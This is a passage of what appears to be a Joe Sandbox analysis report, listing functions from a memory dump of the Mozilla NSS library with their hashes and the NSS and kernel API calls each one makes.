Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 9d85c0775922216c3f9a065d5fa3b97fb0fad530e4efe7e23ee521b9e23e4170
Instruction ID: 194e34e949b29ee3a6f01cc664641c8de4de7cf035f4f4594f530631bef29c0a
Opcode Fuzzy Hash: 9d85c0775922216c3f9a065d5fa3b97fb0fad530e4efe7e23ee521b9e23e4170
Instruction Fuzzy Hash: 90313A71A10240BBEB209F2DCC467667BF4FB46359F19052CE85A87B52DB32E894CBD1

Function 6CAB1F10 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CAB1F1C

Part of subcall function 6CB00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01000
Part of subcall function 6CB00FF0: PR_NewLock.NSS3(?,00000800,6CA9EF74,00000000), ref: 6CB01016
Part of subcall function 6CB00FF0: PL_InitArenaPool.NSS3(00000000,security,6CAA87ED,00000008,?,00000800,6CA9EF74,00000000), ref: 6CB0102B

SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6CBC9EBC), ref: 6CAB1FB8
SEC_ASN1EncodeItem_Util.NSS3(6CBC9E9C,?,?,6CBC9E9C), ref: 6CAB200A
PR_SetError.NSS3(FFFFE022,00000000), ref: 6CAB2020

Part of subcall function 6CAA6A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CAAAD50,?,?), ref: 6CAA6A98

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAB2030

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
String ID:
API String ID: 1390266749-0
Opcode ID: eb34fe8f2f294dc2bcc963af1c25b6f6c7f512672af6e8810c81a1a4fc946748
Instruction ID: d485697a9b2e01f5a3dc782d578587ecb8808e0c2bbddcf1fcaf6ab7f513a736
Opcode Fuzzy Hash: eb34fe8f2f294dc2bcc963af1c25b6f6c7f512672af6e8810c81a1a4fc946748
Instruction Fuzzy Hash: 6121E975A01506ABE7014E25DD40FAA7B6CFF4131CF180616F928A6F80E732E9ACC7A1

Function 6CAE1EA0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,?,6CAC6295,?,00000000,00000000,00000001,6CAE2653,?), ref: 6CAE1ECB

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

TlsGetValue.KERNEL32(?,00000001,?,?,6CAC6295,?,00000000,00000000,00000001,6CAE2653,?), ref: 6CAE1EF1
EnterCriticalSection.KERNEL32(?), ref: 6CAE1F01
PR_SetError.NSS3(00000000,00000000), ref: 6CAE1F39

Part of subcall function 6CAEFE20: TlsGetValue.KERNEL32(6CAC5ADC,?,00000000,00000001,?,?,00000000,?,6CABBA55,?,?), ref: 6CAEFE4B
Part of subcall function 6CAEFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CAEFE5F

PR_Unlock.NSS3(?), ref: 6CAE1F67

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Value$CriticalEnterErrorSection$Unlock
String ID:
API String ID: 704537481-0
Opcode ID: 446db0d13e8d093e768bdb17f1b9f04a91f4189f48c51bbd42432a4d5fef1301
Instruction ID: 7317a267c971a2e93117d23c65e9beeacc5510fd91ff389c0fafd65d43ece649
Opcode Fuzzy Hash: 446db0d13e8d093e768bdb17f1b9f04a91f4189f48c51bbd42432a4d5fef1301
Instruction Fuzzy Hash: 45210675A042149BEB00AF29EC44AAA3779EF49368F184125FE1887702E731D9D496D0

Function 6CAA1DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CAA1E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CAA1E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAA1E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CAA1E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CAA1EAD

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: f83bae2ea8a73437c2b185109c155beee33b7cc3648cfe2dd24a8bf34a99ba98
Instruction ID: 919fed29147e50a51d6e47d190d19b6c6ad524179a2697b1570ab837e1cfa82d
Opcode Fuzzy Hash: f83bae2ea8a73437c2b185109c155beee33b7cc3648cfe2dd24a8bf34a99ba98
Instruction Fuzzy Hash: 72210672E08350EBD7108EA8DC40BBF73A59B84728F188638EE6D57784E731D94987D2

Function 6CBB1E40 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6CBB1E5C

Part of subcall function 6CB69BF0: TlsGetValue.KERNEL32(?,?,?,6CBB0A75), ref: 6CB69C07

PR_Lock.NSS3(00000000), ref: 6CBB1E75
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CBB1EAB
PR_GetCurrentThread.NSS3 ref: 6CBB1ED0
PR_Unlock.NSS3(?), ref: 6CBB1EE8

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CurrentThread$ErrorLockUnlockValue
String ID:
API String ID: 121300776-0
Opcode ID: f00a1fd0c553c3a0f54f96962d73b81da4041f06847eaa74b222ba93af7d1c63
Instruction ID: 4dfb7a14ec317c705281f7465ae219b0088cd6a3ae8677ba0c84ca4a064d1ff0
Opcode Fuzzy Hash: f00a1fd0c553c3a0f54f96962d73b81da4041f06847eaa74b222ba93af7d1c63
Instruction Fuzzy Hash: 0021A175B15592DBD710CF29D840A6AB7B1FF44718B2D8229E819ABF40DB31F850CBD2

Function 6CAFBE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CAAE708,00000000,00000000,00000004,00000000), ref: 6CAFBE6A

Part of subcall function 6CB00840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB008B4

SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CAB04DC,?), ref: 6CAFBE7E

Part of subcall function 6CAFFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAF8D2D,?,00000000,?), ref: 6CAFFB85
Part of subcall function 6CAFFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CAFFBB1

SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CAFBEC2
PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CAB04DC,?,?), ref: 6CAFBED7
SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CAFBEEB

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
String ID:
API String ID: 1367977078-0
Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction ID: 92927d00819075f131b08fdd8b769838583f703efa31f462c6b53ae18c029efd
Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction Fuzzy Hash: F311277660434567F700996AFD80F5B73BDAB40798F084225FE2487B52E731DC8A87E1

Function 6CAAAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6CAA3FFF,00000000,?,?,?,?,?,6CAA1A1C,00000000,00000000), ref: 6CAAADA7

Part of subcall function 6CB014C0: TlsGetValue.KERNEL32 ref: 6CB014E0
Part of subcall function 6CB014C0: EnterCriticalSection.KERNEL32 ref: 6CB014F5
Part of subcall function 6CB014C0: PR_Unlock.NSS3 ref: 6CB0150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CAA3FFF,00000000,?,?,?,?,?,6CAA1A1C,00000000,00000000), ref: 6CAAADB4

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6CAA3FFF,?,?,?,?,6CAA3FFF,00000000,?,?,?,?,?,6CAA1A1C,00000000), ref: 6CAAADD5

Part of subcall function 6CAFFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAF8D2D,?,00000000,?), ref: 6CAFFB85
Part of subcall function 6CAFFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CAFFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CBC94B0,?,?,?,?,?,?,?,?,6CAA3FFF,00000000,?), ref: 6CAAADEC

Part of subcall function 6CAFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBD18D0,?), ref: 6CAFB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAA3FFF), ref: 6CAAAE3C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: b440b8d368c42b8e18e57efd1339ce8901c51065c1f308e7bb4ee7c4bfe6b641
Instruction ID: 119a93f104238bad5b63a5091f76bbe5aba13f48256c49321f9b39c13dafa9c7
Opcode Fuzzy Hash: b440b8d368c42b8e18e57efd1339ce8901c51065c1f308e7bb4ee7c4bfe6b641
Instruction Fuzzy Hash: 33115931F003545BE7109BA59C00BBF73F8DF5114CF084229FC5997B41F720E98986A2

Function 6CAC8E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6CAE2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAB4F1C), ref: 6CAC8EA2

Part of subcall function 6CAEF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CAEF854
Part of subcall function 6CAEF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CAEF868
Part of subcall function 6CAEF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CAEF882
Part of subcall function 6CAEF820: free.MOZGLUE(04C483FF,?,?), ref: 6CAEF889
Part of subcall function 6CAEF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CAEF8A4
Part of subcall function 6CAEF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CAEF8AB
Part of subcall function 6CAEF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CAEF8C9
Part of subcall function 6CAEF820: free.MOZGLUE(280F10EC,?,?), ref: 6CAEF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6CAE2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAB4F1C), ref: 6CAC8EC3
TlsGetValue.KERNEL32(?,?,?,6CAE2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAB4F1C), ref: 6CAC8EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6CAE2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAC8EF1
PR_Unlock.NSS3 ref: 6CAC8F20

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID:
API String ID: 1978757487-0
Opcode ID: 7f78daa2270aa5110ed81f8eb5765562591f9d0d1549fb1e1ce90fb552fa9d52
Instruction ID: 6651939f80688bb74ed4d1e1655f6cf13951a02582b0c932cc20d05771efe3be
Opcode Fuzzy Hash: 7f78daa2270aa5110ed81f8eb5765562591f9d0d1549fb1e1ce90fb552fa9d52
Instruction Fuzzy Hash: EF218D70A096059FD700AF29D5842A9BBF4FF48318F05856EEC989BB41DB30E894CBD2

Function 6CAC28A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CAB80DD), ref: 6CAC28BA
EnterCriticalSection.KERNEL32(?,?,?,?,6CAB80DD), ref: 6CAC28D3
PR_Unlock.NSS3(?,?,?,?,?,6CAB80DD), ref: 6CAC28E8
DeleteCriticalSection.KERNEL32(?,?,?,?,?,6CAB80DD), ref: 6CAC290E
free.MOZGLUE(?,?,?,?,?,?,6CAB80DD), ref: 6CAC291A

Part of subcall function 6CAB9270: DeleteCriticalSection.KERNEL32(?,?,6CAC5089,?,6CAC3B70,?,?,?,?,?,6CAC5089,6CABF39B,00000000), ref: 6CAB927F
Part of subcall function 6CAB9270: free.MOZGLUE(?,?,6CAC3B70,?,?,?,?,?,6CAC5089,6CABF39B,00000000), ref: 6CAB9286
Part of subcall function 6CAB9270: PL_HashTableDestroy.NSS3(?,6CAC3B70,?,?,?,?,?,6CAC5089,6CABF39B,00000000), ref: 6CAB9292

Part of subcall function 6CAB8B50: TlsGetValue.KERNEL32(00000000,?,6CAC0948,00000000), ref: 6CAB8B6B
Part of subcall function 6CAB8B50: EnterCriticalSection.KERNEL32(?,?,?,6CAC0948,00000000), ref: 6CAB8B80
Part of subcall function 6CAB8B50: PL_FinishArenaPool.NSS3(?,?,?,?,6CAC0948,00000000), ref: 6CAB8B8F
Part of subcall function 6CAB8B50: PR_Unlock.NSS3(?,?,?,?,6CAC0948,00000000), ref: 6CAB8BA1
Part of subcall function 6CAB8B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6CAC0948,00000000), ref: 6CAB8BAC
Part of subcall function 6CAB8B50: free.MOZGLUE(?,?,?,?,?,6CAC0948,00000000), ref: 6CAB8BB8

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
String ID:
API String ID: 3225375108-0
Opcode ID: 37e29f5d67ae7a61d21955984ad3215e37416b6eaad80600124dd9590e19775c
Instruction ID: 7b77cd72667b8ee8e5d3ebba09352de019818e7e0b443ff20901ea5c0d760c67
Opcode Fuzzy Hash: 37e29f5d67ae7a61d21955984ad3215e37416b6eaad80600124dd9590e19775c
Instruction Fuzzy Hash: 672139B5A04A058BDB00AFB8C188469BBF4FF05354F054A29DC9897B00EB34E8D9CB92

Function 6CAB8FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6CAC0710), ref: 6CAB8FF1
PR_CallOnce.NSS3(6CC02158,6CAB9150,00000000,?,?,?,6CAB9138,?,6CAC0710), ref: 6CAB9029
calloc.MOZGLUE(00000001,00000000,?,?,6CAC0710), ref: 6CAB904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6CAC0710), ref: 6CAB9066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6CAC0710), ref: 6CAB9078

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: afe81154d393fc03e2c6d84e6efe851cddfe21652026ee715e36085da085bfeb
Instruction ID: 0a0340442ecb92987f8c5c045256d55d541756c353bf49dbade7e779b86a5e24
Opcode Fuzzy Hash: afe81154d393fc03e2c6d84e6efe851cddfe21652026ee715e36085da085bfeb
Instruction Fuzzy Hash: B311E13170016157E7201ABDAD44A6A36BCEBA27ACF590135FC48E6F81F767CDC583A2

Function 6CACCD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6CAE1E10: TlsGetValue.KERNEL32 ref: 6CAE1E36
Part of subcall function 6CAE1E10: EnterCriticalSection.KERNEL32(?,?,?,6CABB1EE,2404110F,?,?), ref: 6CAE1E4B
Part of subcall function 6CAE1E10: PR_Unlock.NSS3 ref: 6CAE1E76

free.MOZGLUE(?,6CACD079,00000000,00000001), ref: 6CACCDA5
PK11_FreeSymKey.NSS3(?,6CACD079,00000000,00000001), ref: 6CACCDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CACD079,00000000,00000001), ref: 6CACCDCF
DeleteCriticalSection.KERNEL32(?,6CACD079,00000000,00000001), ref: 6CACCDE2
free.MOZGLUE(?), ref: 6CACCDE9

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 1dc3327eda7ed08e3745aec8f687c05e76c191419b841396fc7d337d29b59ac5
Instruction ID: a2f2891129208cddca63691f6ced32751132ce2bb748f49781b33c306138d615
Opcode Fuzzy Hash: 1dc3327eda7ed08e3745aec8f687c05e76c191419b841396fc7d337d29b59ac5
Instruction Fuzzy Hash: 3011C2B2B01116ABEB00AF65EC44A96B77CFF0435C7180121E91987E01E732F4B8C7E2

Function 6CB32CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CB35B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB35B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB32CEC

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

PR_EnterMonitor.NSS3(?), ref: 6CB32D02
PR_EnterMonitor.NSS3(?), ref: 6CB32D1F
PR_ExitMonitor.NSS3(?), ref: 6CB32D42
PR_ExitMonitor.NSS3(?), ref: 6CB32D5B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 70f7592b69c7513f9602657e8817e630bfcce8fdfabaab862eec199149b51039
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: A60108B19002A06BE6319F26FC40BCBB3A5EF41318F005525E85D86B11E632F41987D3

Function 6CB32D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CB35B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB35B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB32D9C

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

PR_EnterMonitor.NSS3(?), ref: 6CB32DB2
PR_EnterMonitor.NSS3(?), ref: 6CB32DCF
PR_ExitMonitor.NSS3(?), ref: 6CB32DF2
PR_ExitMonitor.NSS3(?), ref: 6CB32E0B

Memory Dump Source

